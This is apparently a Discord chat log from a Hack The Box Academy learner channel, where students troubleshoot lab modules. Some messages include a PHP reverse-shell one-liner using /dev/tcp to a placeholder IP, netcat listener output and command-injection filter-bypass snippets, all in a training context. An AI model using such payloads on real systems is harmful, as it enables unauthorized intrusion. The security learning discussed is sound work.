#modules
wym?
and I feel like the AD module on the academy is not enough. Is there any knowledge about AD that I should learn more about or is there any document that talks more about it?
dont run just take a step by step
finish ad modules here first
i'm done
its just an intro to AD
the CAPE path goes a lot deeper
What is it?
this has some stuff https://zer1t0.gitlab.io/posts/attacking_ad/
I’ve deleted a chat on instagram and I have regretted it, is there ANY way I can get it back?
megalul
What’s that?
There is no way we can help you with this
I felt the same until I did zephyr and got to practice AD a bit, afterwards I felt much more comfortable. Some tier3 modules are also pretty nice in the AD context
ggs
guys, except the module for ADCS, does anyone have any blog/public/somewhere to read on theoretical, about Certificate Services?
When you ping an IP how do you know if you are pinging a local host or a vm?
ping dont give any info like this
its just to know if host is reachable and up or no
thankssssss
What if you use flag -O?
i love u so much
🥰
nmap dont detect the version or OS 100% right, a lot of false positive stuff u can get from nmap
TTL from nmap output is another way to determine OS/VM
Hi folks, where can I send my troubleshooting request?
I couldn't see any other channel where I could send texts.
I need help with my account verification on HTB discord.
Reach out to an online mod (shield next to their name)
@storm elk are you the mod?
They are a mod
I am, yes
Not necessarily the mod
Feel free to dm me and I will help you sort it out
thanks for responding, and thanks for help.
I need help with account verification on HTB.
As there's no one mod to rule them all
Everyone is awesome
Sparkling is now the mod, master of all mods
I am not, far from
I am at the bottom of the foodchain
does anyone else have problems with commands not working, the ones HTB gives you in the modules, it has happened to me twice, first with the nmap script command not working in the NFS portion of Footprinting (had to google an alternative) , and now in DNS portion where I'm getting "missing property name after reference operator" error after I put in a simple 'dig ns <domain.tld> @<nameserver>' command
Can you show me a screenshot? @tired atlas
You can verify your account via #welcome . Identifier can be found here: https://app.hackthebox.com/profile/settings
You should be able to make it via the HTB account? https://account.hackthebox.com
yeah I'm doing that
Microsoft Learn and official documentation
I actually cannot lol, I graduated uni like 2 months ago, and my uni blocked my email
I had a doubt for the LFI module. When I have RCE i can execute simple commands like ls or cat but when i input a reverse shell and listen on my own machine with nc e.g
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/my_ip/9001 0>&1'") ?>
nc -lvnp 9001
the server hangs but I dont get a connection, even when i am listening on the correct port. Why would the server hang but not connect to my machine?
I am sure support will help you
No they wont 😭 , I actually cannot afford silver subscription
If uni disconnected their account, nothing we can do but recommend them to other available subscriptions
I was referring to them not being able to create a lab account with their Academy account
And are they not able to get back their Academy account if uni blocked their email?
Ahh okay. Gotcha
We can help recover but with evidence and proof
okay 🙂
just wanted to say thanks to the mods here for doing a great job
thank you @autumn sorrel
Good morning guys, query on the Skills Assessment of Windows Privilege escalation PT 1.
Question 2:
“Find the password for the ldapadmin account somewhere on the system”.
I got the answer after privilege escalation I don't know if this was the target or I should have found it first, I have tried all the techniques and I could not find it without privilege escalation, anyone could find it without privilege escalation?
Hackers, any help would be appreciated.
dear all I am new to HTB, but when I go to HTB Academy it shows
We need to perform some compliance verification actions regarding your account!
Please contact us via the support bubble at the bottom right of the page or via the support email at customerops@hackthebox.com.
We are sorry for the inconvenience!
I need your support
Hello
Okay ✅
Can anyone help me with HTB Linkvortex machine
Have you been able to make contact with any official mate
@rustic anchor
Yes 👍
I emailed on mentioned email but no response
How long have you been on this mate ?
@rustic anchor
Can I dm you @bitter grotto ?
Best to ask in #boxes
I don’t have access to this no access
Read and follow #welcome
I created account for HTB last year but this issue I faced and still facing
Hi, I have a problem with the module "Internal Password Spraying - from Linux". I tried searching in Discord but couldn't find any actual explanation. I'm looking for a user that starts with the letter 's' whose password is Welcome 1. With kerbrute I got nothing but with crackmapexec I got another user that starts with the letter 't'. What am I doing wrong?
@rustic sage I need help
please no scammers wtf
did they dm you?
yes
Then block it for your own protection. Do not click on any links
Yeah, that's what I did
hi @storm elk I need help to access academy.hackthebox.com, I am facing issue to access it shows message titled Account verification while my email is verified
I am not sure how I can help you with that, I am just a Discord moderator. Best to ask support
Need to speak to a person? Learn how to reach our support via HTB Labs.
^
Anyone?
If someone know.
Which old domain?
The module has been revised and therefore the questions are also slightly different. It may well be that facebook is now asked instead of paypal
according to you, what is difference between red team operators and AD pentesters?
Red Teamer can perform actions on the physical side: copying badges, picking locks, etc.
red teamer or mafia -))
In the rapidly evolving technological world that we live in it is a constant struggle to keep yourself and your organisation's resources secure. As the cyber security landscape expands, so do the security assessment procedures employed to best prepare against everchanging threats. Penetration testing and red team assessments have become the main...
What you are describing here is a physical pentest
Both
Awesome, hello!
There are few things that need to be updated. Few functionalities' location in tools are changed to other location. How I can request to HTB for updating these content in module?
What I mean is that a Red Team operates on the digital and physical side.
Hello, do academy got pwn module ?
like the buffer overflow modules
I saw the two of them but not more
anyone?
in my experience, not getting the desired results is a matter of using ' and "
web servers like nginx, apache use "<User-Agent>", so avoid using "
You have to put ls+/ or cat+/
maybe but why would the server hang? could it be the firewall?
that module has a ssh connect?
nope
if not, then hackthebox's machines often block requests from outside
ah then thats prob it thx
Did anyone have trouble in the DNS portion of footprinting, when they did it? I've been at it for 6 hours
I tried kerbrute, crackmapexec and nothing. At least with crackmapexec I got a valid user but that's not the correct answer. I'm completely lost, I think something is wrong with the module
What exactly is not working?
Identify if its possible to perform a zone transfer and submit the TXT record as the answer.
This is the question
I've tried
trying to find subdomains, even installed dnsrecon, only to find the authoritative nameservers, the question is asking for the txt record of a failed zone transfer, however when I try dig txt <domain> and even <sub domain> it comes with the nameserver in the authority portion of the result, i'm getting no txt record, or anything.
Check out the || subdomains ||
I havent found any!!
Send me a DM about what you have found.
maybe: try recursive sub.. enum
i wish i knew how to code properly
Hey, does HTB Gift Cards allows to subscribe to HTB academy as student ?
'kay.
What does this have to do with Academy modules?
Okay
Thanks
Network enumeration with nmap medium lab- i tried a lot of techniques but nothing worked idk what to do
Sure
I would ensure you are using the correct VPN config file and take that note about the VPN config as a hint.
Pls subscribe
Hi everyone, just completed the What's Next Knowledge Check box at the end of the Getting Started module (the one with GetSimple installed). I managed to get access and complete the section via Metasploit using this exploit, but I wanted to try giving it a go manually.
So I get a foothold manually and gain access to a webshell, but if I try entering any reverse shell one liners into it, my listen server doesn't seem to catch it. If I change my payload to instead run that reverse shell one liner instead of give me a web shell, my listen server still didn't catch it. Does anyone have any idea why?
Sorry 😞
@Tub try a different one liner.
Or wait, you already have a foothold but you want to stabilize / get different shell ?
does your listener and payload have the same port?
are you also using your kali/Parrot OS IP as the LHOST?
it was a good one
I tried so many one liners
That's right. I wanted to run LinEnum on there but I didn't think that running it on a webshell was a good idea
I was yeah, but bear in mind I was trying to do it manually and not with Metasploit
I read that part, same concept still applies. Trust me I've made that mistake a good amount of times
oh I see, LHOST was an exclusive thing to metasploit, not a general term
yeah, so if you're using python3 -m http.server 8000 and have 0.0.0.0:8000
your LHOST is your machine
You have to add your IP to the payload
LHOST --> Local Host
RHOST--> Remote Host
that's how i remember it
Hi guys is there the site of ippsec where he puts retired boxes into the right modules?
I remember someone sending it before, think it was marcielee who sent it
thanks but it was an ippsec website
I need a little help how can i start Process Hacker?
yes he does have a site
https://ippsec.rocks
Search utility for IppSec's YouTube videos
thank you, it was this 😄
read the book
Information Gathering - Web Edition
What is the API key the inlanefreight.htb developers will be changing too?
I don't understand how to find it? I have tried some tools show in the course and they don't find any comments or something to answer.
anyone do this module ?
Crawling is fun on the right subdomain
But what is the start ?
I mean, they are saying inlanefreight.com and in the IP inlanefreight.htb.
someone do you know how can i run this?
From rdp to the target
Process Hacker, A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.
yes i'm in but i don't know how
Yeah so I added the IP to the /etc/hosts and in the report from finalrecon I have one sub, and when trying : error.
How do you have the entry?
Wdym?
here
Did you add the subdomain in your hosts file?
Yes:
cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 debian12-parrot
94.237.58.147 inlanefreight.htb
What does your entry look like in the hosts file
Don’t see the subdomain
^
But I have to enumerate them??? How?
It's in local.
That’s part of the module?
Check under c:/tools
vHosts needed for these questions:
inlanefreight.htb
That's your starting point
You need to enumerate until you find nothing new
Ah okay I understand marcie xd, we misunderstood each other.
^
Yeah, that's not a subdomain
I thought we didn't need that, at least that's what I understood from your answer.
That's a different domain entirely
No but to find the subdomains, I thought we had to add them by listing the other one, with the ip.
i can't doing 😦
No
Doesn't the module have a list where all the tools are located?
Read vhost enumeration
Also, that's not how windows works
No but I rewatched but I thought it was a question apart from me, hence my initial question to Marcie.
Okay 🙂
What you have, is brain damage lol. I suggest learning windows basics first
¬¬¬¬¬¬¬¬¬¬
You were trying to do linux syntax in windows
then what can i do?
Use windows syntax 
U can try running this in cmd powershell -ep bypass
That's not their problem m8
mb
.
I usually use that and it allows me to use linux commands
They're in cmd
ahh
And no, it doesn't 'let you use linux commands'
Lots of things in powershell are aliased
ls is an alias
I mean like ls and cd some basic common ones, and thanks for clearing that up
ill search what it does
cd is just a commonality between each
ahh I see
some commands are same in linux and windows but very few
but they might have diff syntax tho
ahh okay
Powershell aliased a bunch of things
nothing...
-ep == execution policy
thank u
You just launch a ps console with a bypassed execution policy, meaning you can run commands and scripts that may normally get blocked
then?
My explanation wasn't towards you
I suggest checking where the tool is located from one of the module sections
Or maybe you can use the windows search feature to launch it
the problem is that the commands i cannot use
It's not that you cannot use commands
It's that you're using invalid syntax for the os shell you're using
If you haven't already, I suggest the intro to windows cli module
That'll get you familiar with windows syntax
Then you forgot your basics
maybe
Not a maybe
😦
You literally posted a screenshot of you using linux syntax in a cmd prompt
hello i am in Stack-Based Buffer Overflows on Linux x86 skill assessment
i got buffer overflow but in normal user and i cant read /root/flag.txt
```
> nc -lnvp 3301
listening on [any] 3301 ...
connect to [10.10.14.16] from (UNKNOWN) [10.129.42.191] 52618
cat /root/flag.txt
cat: /root/flag.txt: Permission denied
^C
```
any body ?
Hello guys,
Have an issue with my module linux, it ask me :
What is the index number of the "sudoers" file in the "/etc" directory?
Here my answer:
1760669
Here how i found the result:
stat /etc/sudoers
File: /etc/sudoers
Size: 415 Blocks: 8 IO Block: 4096 regular file
Device: 254,1 Inode: 1760669 Links: 1
Access: (0440/-r--r-----) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2025-01-15 11:56:15.129999999 -0600
Modify: 2024-10-07 05:07:43.764188599 -0500
Change: 2024-10-07 05:07:47.677515898 -0500
Birth: 2024-10-07 05:07:43.657522095 -0500
And my answer is false, what's happening ?? Bug?
Completed, thx for confirmation :>, marcie as well :>!
Great job
Are you ssh into the target?
bro ?
.
You might be on ur own with that ngl 😭
No
Should probably do that
hello
are you root tho?
no
We see the message bro
I haven't done that one
…
```
> nc -lnvp 3301
listening on [any] 3301 ...
connect to [10.10.14.16] from (UNKNOWN) [10.129.42.191] 52874
id
uid=1001(htb-student) gid=1001(htb-student) groups=1001(htb-student)
```
you’re not root, so how could you read a flag in the root directory?
Good answer ty, but i absolutely don't understand, they never asked to go on ssh 💀
Introduction to Digital Forensics : Skills Assessment
Determine the registry key used for persistence and enter it as your answer.
Do we have to use only Velociraptor? If possible, can I have a hint? Thank you.
Preferably, yes. Velociraptor has some pretty neat pre-configured hunts that you can use
yea i know but i am stuck on this question i can't find a good Artifact that describes registry
Hi guys, query on the Skills Assessment of Windows Privilege escalation PT 1.
Question 2:
“Find the password for the ldapadmin account somewhere on the system”.
I got the answer after privilege escalation I don't know if this was the target or I should have found it first, I have tried all the techniques and I could not find it without privilege escalation, anyone could find it without privilege escalation?
I don’t think it’s possible without escalating first
Oh ok thank you !
Whoever put the "thick client / fatty" section in the "Attacking Common Applications": I hope that your pillow remains warm however many times you turn it around, and I hope that you always get something stuck in your teeth when you eat
not that it is disproportionately hard in comparison to the rest of the module (it is), but the infra doesn't follow the course content, so you do literally what it says in the course contents and it doesn't work, and you think to yourself "huh, I must be stupid, let me try again" and it doesn't work again.
Then you turn off the machine, restart the environment, wait a little bit for everything to settle. Try again, this time carefully moving through the course and... hey, it doesn't work again!
And then you do it another day, again, it doesn't work, you check the forums, you look at what people who have succeeded have done, hey, you've done all those same things and it didn't work.
And then, one day, you just do the exact same thing you've done for like 25 times now. And it works. It works. Why does it work now? Why?
rant over, I'm going to try finish that module now 🫡
Average thick client experience
Hi guys
does anyone know why the frik my firefox is so slow? I have like 9GB assigned to my VM
3 processors too
Finished. It wasn't even that hard! It was just stupid! It didn't work and then it magically started working. Argh!
If it's slow on all websites, but other software works, it's an issue with your version of Firefox. If other software is also slow, then it's a RAM/CPU issue, check top (or Task Manager if you're on Windows). If it's slow only on some websites, it's those websites.
thanks, do you know how I can update my firefox in linux?
it depends how it was installed - if you're running a Debian derivative, probably apt-get update && apt-get upgrade will get the job done. If you're on some other platform or it was installed through flatpak or something, then Google for that specific platform
okay thanks, appreciate it 🙂
anyone around for a nudge on Skill Assessment - Injection Attacks
dming you now
hello i hope i am in the right place i have been stuck on the flow control loops Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable. i keep getting the same answer but it is not right
So sorry mate
Include a link to the module / section so people know what you're talking about 🙂 Sure, a name is fine, but a direct link helps.
it is how the world works, i went to school for cybersecurity and i liked the school portion but now that i am trying to find a job and do things like htb i now know i am in the line of work
So earlier in the section there is an example of looping n number of times. In the Exercise Script you are provided with the information you need, and a place to put the steps to answer the question. I'd say double check how you are looping, that you're looping the right number of times, and that you're setting the variable in between loops correctly.
It's a Tier1 module, so can't say much more detail here
and it's not a module I've done personally, so if anyone else wants to give some advice in DM, or here without giving it away, go for it
i have been at this for 4 hours i am going to give up thank you for looking it, if i am not going to get by now i am not going to get it at all

Hello! I'm extremely new to HTB, and was wondering about unlimited pwnbox access?
You gain unlimited Pwnbox access via subscriptions: https://help.hackthebox.com/en/articles/5720974-academy-subscriptions
Learn about the different Academy subscriptions.
(monthly and annual)
can you setup a pwnbox on vm?
I mean, im still new to all of this in general as well. I do have VMware
And if I buy cubes (just the cubes themselves) does that grant access to the box or no?
I don’t think so
Ahh. Well I appreciate the answers and help
Anytime man
What module are you doing lol?
Just finished navigation on Linux Fundis
nice I am doing pen testing lmao by the time I finish school I wanna have my life set so yea
That’s what im aiming for too. But also wanna try to help the online community best I can yf?
yeah I get that lol good contribution
I set up arch in three hours, I think I don’t know what im doing
uh arch is relatively hard to setup if you have no previous knowledge of Linux so I don’t blame you
Still looks cool tho
It is lol I am more of a kali guy tho
Hello guys, im new here and im starting to do the first module Linux Fundamentals, maybe i didnt understand why gives me an Error every time i wanna connect to "My workstation" and do the question from lesson to continue in the right way, if someone can tell me something about it i will appreciate, thanks...
You can do it from your own vm
i have vm ones ready but i dont know who install vpn there
and also i dont wanna disturb you or someone more, just i will check it
Openvpn is already installed on parrot and kali
but im lost a little bit me english is not really good in off
ive noticed a few of those questions' answers are out of date
All you need to know about the VPN Connection for Academy
ah thanks, and sorry 🫂
but still, dont let it get you down
you can do it broski
Nope
they were for me
when i was using the pwnbox and had to use the uname command to enter the kernel release/version, it wouldnt take it
There's a target you need to ssh into
googled it, found out the answer to the question was 2 versions behind what was on the pwnbox
yes im aware
The target isn't the pwnbox
hmm
Yup, exactly that
i cant reconnect atm because i already did my one per day
You can connect with the VPN instead
but if i do it again and it switches from 6.5.0-13 to question answer then ill be flabbergasted
Pwnbox is a web hosted attack box
Target is a machine somewhere meant to attack/connect to
Yes
Not theoretical
.
ahh so thats why theres a download vpn connection there then
Yep
Error validation quest
Need some help? Learn how to reach the support team on Academy.
Try changing vpn regions
In stealing hashes module, how can SMB Auth from a windows box over a chisel proxy? Wouldn't 445 be in use already so don't understand how chisel has bound to it? The server comes started on the box for this lab, am I thinking about this wrong?
Chisel just reroutes, doesn't necessarily bind to it
Also idk what you mean by "stealing hashes module"
What's the actual module name?
Chisel creates a port forwarding bridge
But the LNK file points at my attacker box, so it shouldn't even be talking to MS01 that's running chisel?
It says hey, take requests bound for x machine:port and send it to y machine:port
It has to talk to ms01 to reach your machine
Ah okay, so when DC01 tries to hit my IP the chisel server will also be responding to that IP for me?
Otherwise it can't possibly reach you
Then routing the traffic, think I get it now thanks haha
I thought since the chisel server is already running in the lab there was some config needed
@fathom pendant . This is in my own vm
- You need to download the vpn file
- run with sudo
thanks so much : )
need help with a module in the windows attacks & defense
i am on "Kerberoasting" and am having a hard time ssh-ing back to the kali machine
keep getting an error "ssh: connect to host 10.129.204.151 port 22: Connection refused"
i am doing what it said to do in the overview, I got the passwords into a file. Now i need to share the file back to the kali vm from the rdp machine.
excuse me, at the footprinting module DNS section, what is this asking us to give?
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
i don't understand what they are asking for?
Fqdn is like www.google.com
Fully Qualified Domain Name
It's asking for the fqdn of the name server
heyy i have a problem, why i dont have openvpn installed on my parrot os in vm?
sudo apt install openvpn
it says that openvpn is already the newest version, though when i try to use it terminal says command not found
Also run it with sudo
🤦♂️
lol
ye it doesn't work without sudo
also you cannot even autocomplete the given file's name in the terminal
Hello, I am a newbie student and I need help with something could anybody help me please?
Are you sure on this? I'm just really confused
Here's an example
DC01 - 172.16.0.1
MS01 - 172.16.0.2 & 10.10.14.1
AttackBox - 10.10.14.2
How can DC01 opening a LNK file pointing at AttackBox not drop the connection? I understand chisel is forwarding traffic that reaches MS01, but the LNK file doesn't point at MS01?
you need to run it as root/sudo anyway ¯_(ツ)_/¯
It can’t
But why not just open inveigh on the windows machine?
That's what I would normally do but It's on the module CME - capturing hashes and it uses chisel, so was wondering how it's possible
do i have to connect to new vpn for every new exercise/section?
so just regenerate targets
Yep
Module: Password attacks, section: network services
When I try to brute force password on ssh with nxc, after first few failed attempts I get ERROR Internal Paramiko error for training4:1234567, Error reading SSH protocol banner. I set threads to 1 so I guess it isn't rate limit?
Ssh sucks to bruteforce
and ultimately, would stop loading and I won't get a revshell. Is there something on the server that prevents it?
You can try to set listener on different port, maybe firewall blocks connections to specific ports
I'm not getting any responses..
I mean, I have got the required flags, but I just wanted to kill the minor inconveniences haha
Can you ping your host from target to ensure your host is reachable
Through command injection
I think there might be restrictions on the public machines
tried &cmd=ping 10.10.14.4 but that didn't get any response other than
selected_language|s:31:"";preference|s:7:"Spanish";
Can’t remember if that one is public tho
Very likely. I think they designed to get the flag in a particular way
The target is running on a docker container, not inside academy's network. You're not going to be able to ping your tun0 IP address with it, nor establish a shell to it. you'd need to forward ports in your gateway/router etc and have it forward traffic to your kali's box, if it has an IP on your internal network
also if you're running a listener below port 1024 you're going to need to use sudo to bind the port
You're not gonna get a callback
It's a public docker container, it's not meant to be able to call back to other machines
You gotta use burp
You don't have to use burp
Is it ok to do Attacking Enterprise Network partially blind and understand what and why I missed out
I feel so guilty seeing one walkthrough yesterday haha
There shouldn't be any walkthroughs for it, the module itself is the walkthrough
It's a module above t0
I suggest making sure you understand where your methodology is failing you
Ya the module walkthrough
I didn’t check through all the services and assume only those common ones like SMB FTP are vulnerable
Treat everything as a blank box
Assume nothing
This is also advice for the exam, assume any system you run into on the network is a blank system, unless you pillage info that says otherwise
Got it, will learn from my mistake thanks
Enumeration is an iterative process; each system you start from 0
is this the only support for htb
Need some help? Learn how to reach the support team on Academy.
Assuming it's for academy and not labs
i am stuck on a question and about to give up on working in this field
Well if you say what you're stuck on and what module and section you can get help
Introduction to Bash Scripting Flow Control - Loops i was in here earlier and was told since it is tier 1 it is easly
i am new to this field
I believe the bypassing filters section goes over how to test for which chars are triggering the filter
Your first filter is missing something
Make sure you're not adding a new-line or whatever with b64 or echo
I didn't do it on my main laptop/vm so I don't have the code
It's not triggering the filter, it's just giving me a null output. The filter for this particular exercise is front end and the output would be "invalid input" if it triggered the filter
You don't need to see the value
i dont know what that mean
Read the question carefully
The number of characters in that last iteration is what should be assigned to the salt variable
And then, when the code is executed, you'll get the answer
Would you mind expanding on this a bit?
From my understanding, the first payload should output something like:
ping -c 127.0.0.1;
ls /home
which is essentially the same output as the second payload if I'm not mistaken. I was at a wall with the first payload until I simply tried a different bypass method.
Yeah mb, are you sure ; is a valid bypass character
That's more what I meant
Also it wouldn't output something like that
You don't have a newline character
Deleted your og message since it's a spoiler, spoiler text does fuck all
From the lesson I gathered that ${IFS} was the same thing
Nope
as new line
sorry about that
It's more of a whitespace
Yeah, there's ways to determine that
Fun fact ${#var}, echo -n $var | wc -c
Interesting. Well in that section it says "So, let's try to use environment variables to add a semi-colon and a space to our payload (127.0.0.1${LS_COLORS:10:1}${IFS}) as our payload, and see if we can bypass the filter: As we can see, we successfully bypassed the character filter this time as well." so I got a bit confused
ahhhhhhhhhhhh
ok thanks for your time! ❤️
I get it now
My next question is how come a space bypasses the filter, but gives me no output on the HTTP response, but the new line character does give me output on the HTTP response
I'm doing the proxying tools module and I can't get the proxychains to work correctly and send the traffic through burpsuite. I've changed the last line of the configuration file like in the instruction to http 127.0.0.1 8080 but when I run the command proxychains4 curl http://94.237.50.135:32600 the burpsuite doesn't intercept it. It does however when i use this command which was proposed to me by chatgpt curl --proxy 127.0.0.1:8080 http://94.237.50.135:32600
I just don't know why the proxychains isn't working as it's supposed to
As if it didn't care about the configuration file
Proxy stuff is finicky like that
cool
Did you try running proxychains with sudo
Awesome
Don't join that server
I just did and the result is the same
I get the response but it doesn't go through burp
Do you recommend I just ditch the proxychains?
I notice a lot that those modules are often outdated
That some things are done different in new versions of programs
And it's just confusing
#rules English server
i realized that as soon as i sent the msg
It could be wc -m not -c
Well Can you guys help me out ?
;-; okay so i am planning to purchase a laptop for myself . Specially only for office works not for hacking. so should i go for mac m1 ?
That has nothing to do with this channel
Read and follow #welcome to be able to access other channels
it did not change
Well you need to update the var variable, take a look at what you copy/pasted again
You're updating a variable named ar not var 
the bold it #
That's discord formatting it with markdown
If you link your account via #welcome instructions you can do code blocks, but I'm yeeting them bc spoilers
It looks like you're not encoding the variable in b64
Understanding the instructions is important
Wrong
You only count the characters after the loop
Otherwise your variable then becomes;
Var --> base64 of that var --> length of that base64, which once you're at a certain point is just iterative
now var equals the result of wc -m
take the -n out
yeah i just tried it
You do need it for the var iterative though
i got 34070 and it was wrong
Because that's not gonna be the answer

The salt value is used to decrypt the message to give you the answer when you run the script
The length isn't the answer it's only part of the solution
That's why you insert the for loop where you do
lock in man you got this. Take a break if you need to
i have been at this for 8 hours
maybe you need to take a break and come back at it fresh again later 🙂
just part of being human sometimes
what else are you stuck on?
it is the only question for this module
theres 2 parts to the question
Part 1 is getting the loop, part 2 is running the script and getting the answer
The answer will be HTB...0x
thats not the number
you were closer before
just assign the salt variable to the amount of $var characters so you will get the flag automatically
Am I wrong in remembering ${#var} for count
i am trying to find the code i had when i was closer
not sure, this is my first time looking at this module
I somewhat like this question as it mirrors what you'd see in a coding interview type question
It's a general bash thing
Many ways to cook an egg
hi folks
Got a question about Attacking Common Services - Assessment Medium
I actually resolved it.

But for the "thing" we need... I ended up manually editing that thing, removing extra spaces, etc.
My 50-inch monitor helped 😂 but I know there must be a more elegant and proper way to do it.
Not sure about manual editing
do i have the wc in the correct place
I suggest stopping posting the code
I mean... I edited the || ssh key manually. I removed the extra spaces ||
I didn't have an issue with extra spaces
small issue here with this or im just confused
did you resolve it recently? Maybe the exercise changed.
the result is 1 character smaller than the answer 😂
I initially got a || Load key "id_rsa": error in libcrypto ||
That is only part of the problem
The salt is used to decrypt something
Run the whole script
i thought i was
the salt variable should be getting used
The wording on that question could be a bit clearer to be honest
i think i decrypted it and it starts with U2Fs but it did not work
marcielee already said it should start with HTB
Was gonna say take it to DMs, but I'm so tired of watching for spoilers for content over Tier 0
It's literally in the channel subject
so I'm done with that
I've been nuking the script excerpts
you can dm me the script
I'm eating some corn that's popped
you have to add someone to dm, right? i have not used discord very many times
Depends on how they have their DMs setup
Mine used to be open, but I changed them recently
You should ask to DM before doing so as well #rules
I tried without removing the extra spaces and it fails. It needs formatting for sure.
¯_(ツ)_/¯
I love looking for mats at the weekend
Yeah that's weird, considering it should be new-lines
I wonder how you copied it
The protocol used probably did something funky
I did not even copy it, lol... I moved the whole thing via python upload
thanks for the help, i am calling it quits. if i can't figure it out now i will not be able with someone. i know you're not giving me the answer, i get i need to learn but i am a classroom learner
that'd probably be why
no no, it is like that in the server itself, lol
I think you're close michael
because it is part of a || mail ||
Yeah i know
Want one last go in DM, show me what you got?
But sometimes pop3 and imap have minor differences like not encoding the newline properly
let me ssh again
wait what? lol ... what did you say?
I just used the method to connect directly to the mail portion of the server
I did NOT obtain it that way, lol

Aha

Or imap(s)

Weird I don't recall that formatting issue
Connecting through a windows commandline, or powershell?
Although I think pwsh on Linux uses just LF instead of CRLF as cmd does
Even so, an LF should still break line on cmd right?
Also spoiler tags do sweet fuck all
Your image contained the username user@inlanefreight.htb
Fixed it
👇
freaking spaces, lol
now I can go to bed and I won't be thinking about it all night
I didn't use a mail client
but I did 😂
no idea, honestly
I was getting those weird formatting errors using the other protocol as well
Thanks anyway. Netflix and cookies time. Then bed. Last season of Dark. But it seems I will have to repeat the whole thing again 😂 what a complex show
did anybody have a clue with .vhd file in password attack lab - hard?
i'm already using john to crack the password but it didn't give me anything
Did you do the proper 2john tool?
yap i already
but i think i already figure it out
i forgot to use the grep "bitlocker $0"
Hi, I am on module Command Injection - Advanced Obfuscation, doing the task, who can help me out with the payload?
Where can I learn video editing guys?
yeah dm the payload
On a server that's more focused on video editing?
Hi guys. I looked it up. Synack has network pentesting bounties. Other bug hunters I have talked to say I will be behind more experienced pentesters if I do it but also that doing Synack is a good way to get real world experience and once I get my CPTS it's a good place to practice network hacking skills legally. Synack Red Team professionals told me this.
Even if I’m behind other pentesters, real world experience helps. I know Synack does network pentesting because I talked to Synack admins and people that have worked there and looked at their website.
Ah yes, definitely not biased
Ok so you’re saying their platform has people telling me to do illegal things? How would that help them?
When did i say that?
I just meant the people giving you the info are biased
Look up the definition of the word
It's not just bug hunters, I looked on Synack’s website and it's there
Biased != illegal
They call it “host penetration testing”
It just means they're more likely to lean one way when talking to you
Of course Synack would wanna coax you into joining lol
They also do cloud, mobile, web, and even social engineering pentesting according to their website
Ya but why would they lie? That would be fraud
They lure you in with their "real world experience" and drop you onto a web bounty cos thats all they actually have
Didn't say they're lying
And if they aren’t lying then are you saying using synack to practice hacking is a bad idea?
If so, why?
You have to actually get the work
Oh ok ya
They don't just hand you something to do
Also this is more relevant in #careers-and-certs
Ok let’s move convo there
Hey there, currently doing CDSA course, I don't understand why sometimes like for example the module "Windows Attacks & Defense" - "Credentials in Object Properties" , 3rd question I was asked to find the TargetSID for the user Bonni from Windows Events, but I don't have any events having the user "Bonni", it happened also when I was first section "Kerberoasting", 3rd question " what is the ServiceSID of the webservice user" and I didn't have any "webservice" user anywhere from Windows Event - Security
I searched through Windows Events gui and also using Powershell, I was able to find all other users except the ones in the question
Did you try checking the DC?
Yes the question is asking to connect to DC1 with some creds, so I'm looking from there
About Kerberoasting there were a lot of logs so I was thinking okay maybe I missed something somehow, but for the "Credentials in Object Properties" there were not so much events and going one by one, I couldn't find "bonni" as stated in the question
did you filter 4771 and account name?
yes
PS C:\Users\htb-student> Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4771 and */EventData/Data[@Name="TargetUserName"]="bonni"'
Get-WinEvent : No events were found that match the specified selection criteria.
At line:1 char:1
+ Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4771 an ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (:) [Get-WinEvent], Exception
+ FullyQualifiedErrorId : NoMatchingEventsFound,Microsoft.PowerShell.Commands.GetWinEventCommand
Same thing by searching manually with the gui
i just did it with xml filtering
Alright, thanks for your time. I'll try to reload the machines tomorrow and see
Hey I can teach video editing
oh man can't wait for the bots to start scamming each other
😭
would love to be a fly on that virtual wall, watching an endless loop of "ok, before I can do that I need you to send a $100 amazon gift card to this address." "Sure! Before I can do that, I need you to send a $100 amazon gift card to this address." "OK, I'm on it. Before I can do that..."
✌️
anyone know why?
You can read the error message
i know but its a valid command
--bloodhound is a valid command, yeah
bloodhound not boundhound
LMAO my bad HAHAHA
someone needs to take a nap
Freud would have something to say about this, probably
Hello! I would like to know if the activities in NTFS vs. Share Permissions section in Windows Fundamentals can be done with the vpn in my attacker machine alone without the pwnbox?
I tried to use the pwnbox but it can't connect to the share somehow
Same goes for my own attack machine, I can't list the shares via smbclient
if I'm using pwnbox how would i download the resources under the module
nvm
just emailed it to myself
the pwnbox has internet @tired atlas
anyone available for help with this assessment
nxc ldap IP -u 'USER' -p 'PASS' --bloodhound --collection All --dns-server IP
why doesn't this work? is it because the internal host can't connect back to me?
have u tried the old version?
im using ligolo btw
No because it starts to run pwnbox inside the pwnbox which fucks it up, if I open the module in Firefox
is there a way to PrivEsc to root if you know open ldap admin creds?
nxc and bloodhound ingestors are too weak with DNS , check rusthound
Okay because sharphound won’t work either
there's also rusthound.exe
Okay thank you for the info, been looking for other data collector but didn’t notice rusthound
damn
I'm able to access the internal server for the injection skill assessment, having issues reading files. any help greatly appreciated
@torn skiff zip the folder and certutil maybe ?
Hey, I have a question. I feel like my learning level isn't increasing. I've finished the htb web course and I'd like to practice on the web but I've noticed that without a write-up I can't finish a box. Do you have any advice for me in terms of methodologies or is it just try harder?
Can anyone help me on command injections skills assessment?
I think i have found the right spot to inject, as I'm getting the "Malicious File" Error.
And I tried many different ways to be able to get the flag, but to no success. I think the main issue is I couldn't escape to the subshell so the command can be executed, so it's being recognized as just regular input. A nudge would be helpful.
What is the question
What web course were you doing? Also if you take good notes on the modules related to the boxes and copy common commands you know you will use, and consistently have a work period, you're going to notice the difference in your level, enough so to complete your first box with minimal to no help. But it's going to take a while.
Same hard stuck
Web Academy.
I don't see that, could you take a picture and send to me?
I'm talking about HTB Academy.
So what path or modules were you doing?
All the modules. I finished in december.
You finished all modules on htb??
I found it
Yeah for the Bug Bounty Hunter.
So if you notice
You get an error when running anything
